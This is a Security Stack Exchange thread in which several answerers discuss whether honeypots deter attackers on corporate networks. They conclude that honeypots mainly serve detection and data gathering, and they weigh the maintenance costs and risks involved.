34

According to Microsoft, adding a honeypot to your corporate network is an effective way to deter hackers from compromising your network.

Aren't honeypots more for research purposes and not ideal for corporate networks?

Wouldn't having a honeypot on your corporate network likely give a hacker a better grip hold in making attacks?

More information:

Security Fundamentals (Microsoft Virtual Academy). The quiz for #4 made that claim. I answered based on my understanding in the security field and got it wrong. Hence my confusion.

Jason
  • 3,086
  • 4
  • 20
  • 24
  • 9
    Where does Microsoft claim that? Please post a link so we can see the context and read their reasoning behind this claim. – Philipp Jun 17 '14 at 19:58
  • 3
    http://www.microsoftvirtualacademy.com/training-courses/security-fundamentals -- The quiz for #4 made that claim. I answered based on my understanding in the security field and got it wrong. Hence my confusion. Maybe it was just a typo? – Jason Jun 17 '14 at 20:32
  • 3
    I would assume it was a mistaken word choice. – schroeder Jun 17 '14 at 20:36
  • 2
    This question can be improved by adding a screenshot and/or the quiz item to this question. – 40XUserNotFound Jun 17 '14 at 22:53
  • 1
    @Cupcake So, what are you waiting for? – Pierre Arlaud Jun 20 '14 at 09:06
  • 1
    [Microsoft has 1 million servers, although nobody seems to be sure why](https://what-if.xkcd.com/63/) -- heh, now I know! – Damon Jun 20 '14 at 10:23

5 Answers5

51

Deploying a honeypot is not unlike adding a painted door or a fake safe to a bank vault.

It does not deter anybody (its purpose is not to be detected as a honeypot). Possibly someone misspelled detect.

It can reduce (somewhat) the time spent by attackers against the real door. Not by much.

More than that, it can be optimized for data gathering (simplistically, you know nobody is going to ever use the services on the honeypot, so you can tune them all to "log everything high volume paranoid dump dump dump". Service efficiency goes to hell, but as soon as someone attempts anything you need guess nothing. The "safe" is all alarms, and no bullion.

Even more, you can correlate what is happening on the honeypot with what is going on in the rest of the network. The honeypot will tell you what's behind what the other machines report as unusual but random "noise".

Finally, the honeypot can apparently allow an attack to succeed, so that you can gather yet more data. Example: the attacker wins a root shell on the honeypot. He proceeds to download more sophisticated tools. Now you have, at the very least, a copy of those tools as well as an idea of where he downloaded them from.

(If you have time you can crash the connection in a not-too-suspicious way and let him reconnect later after having added suitable instrumentation to his tools, that are now his no longer).

You can determine whether he's just a script kid looking for some warez bouncing, or someone who actively targeted your network. Even by avoiding the honeypot he will tell you something that's worth knowing.

But pretty much nothing of the above comes for free; nor will it work by itself. You need someone continuously managing (normally at a very low level, but continuously and always ready to escalate) the honeypot. The honeypot has to be maintained and updated, just as much (possibly much more) than the other boxes.

You have to decide whether the gain is worth the pain, and whether you can invest in the necessary pain.

Just "adding a honeypot" will do nothing to increase the network security; to the contrary, it will engender a bit of false security, and possibly provide a security breach if the honeypot isn't as well insulated and armored-in as you believed; it might also attract more attention than if it weren't there, if it offers services or vulnerabilities the other machines don't share.

LSerni
  • 22,521
  • 4
  • 51
  • 60
20

Honeypots are not a deterrent control, they are a detective control. As such, they can be very powerful in corporate, production networks.

I run many honeypots and they provide a useful set of data apart from IDS/IPS. They can tell me the intent of an active attack, the sophistication of an attack, and any contact with a honeypot indicates a serious event. Sometimes, I see what are obviously people 'looking around', and other times I see very complex and planned attacks. Both need to be dealt with and I know how seriously to apply resources to investigate.

Properly configured and secure honeypots do not allow attackers to pivot to other assets (although some can make the attacker think they are!).

It is also true that honeypots can be used for research. I run my own honeypot for that very purpose. But, as an inexpensive detective control, it adds depth to what is usually only seen in logs and packet traces.

schroeder
  • 123,438
  • 55
  • 284
  • 319
8

The question reminded me of an article from a not so distant past that surprised me with a similar claim. I was able to find it again, it was "5 Reasons Every Company Should Have A Honeypot" on Dark Reading from October 2013. Summarized, their five reasons are:

  1. Attackers test their tools against standard anti-malware software, so a honeypot as a system with low false positives will be good to detect attacks.
  2. Honeypots can slow down attackers by setting up decoys and distracting them from the real targets.
  3. Production honeypots do not require much time investment (compared to research honeypots) unless an alert is triggered.
  4. Honeypots help train the security team.
  5. Honeypots are cheap to set up, because there are lots of free tools.

I do not really agree with all their reasons. In fact the only convincing one for me is #4. Number 2 might be valid, but needs either a sophisticated and probably expensive setup or only unexperienced attackers. Otherwise, they might be able to look behind the curtain very soon and look for the real assets (maybe even exploiting some weakness in the honeypot software itself).

Dubu
  • 311
  • 2
  • 8
4

Honeypots are not a defensive mechanism. They are a medium that can emulate your network and can help you in identifying potential threats on your network. Setting up honeypots in corporate networks can give you an insight into any attacks that are directed towards your corporate. Based on the results captured in your honeypot, you can further strengthen your organizational defence mechanisms.

abhinav singh
  • 283
  • 1
  • 4
  • 3
    Your answer is correct, except for the first sentence. Honeypots **are** a defensive mechanism. The defence is all around detection and alerting. – Rory Alsop Jun 18 '14 at 08:28
4

Although its primary purpose is in detection and mitigation, I can see how it would also act as a deterrent, if the attacker had reasonable suspicion you use honeypots, but didn't have a way to determine exactly where. Whether a specific machine is a honeypot should be kept secret, but there's little risk in disclosing the fact that some of your machines among hundreds are honeypots. For governments, large businesses, and security-sensitive smaller businesses, you would pretty much assume they use honeypots.

Think of it this way. Everything else being equal, if you had the choice between attacking an installation that probably has honeypots and one that probably doesn't, which would you choose? Of course, it's not a very large deterrent, but what is?

Karl Bielefeldt
  • 423
  • 2
  • 8